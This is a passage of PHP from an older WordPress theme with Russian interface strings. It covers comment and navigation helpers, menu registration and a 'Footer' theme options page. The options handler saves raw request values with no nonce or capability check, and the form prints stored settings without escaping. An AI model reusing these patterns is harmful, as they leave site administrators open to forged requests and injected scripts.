}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
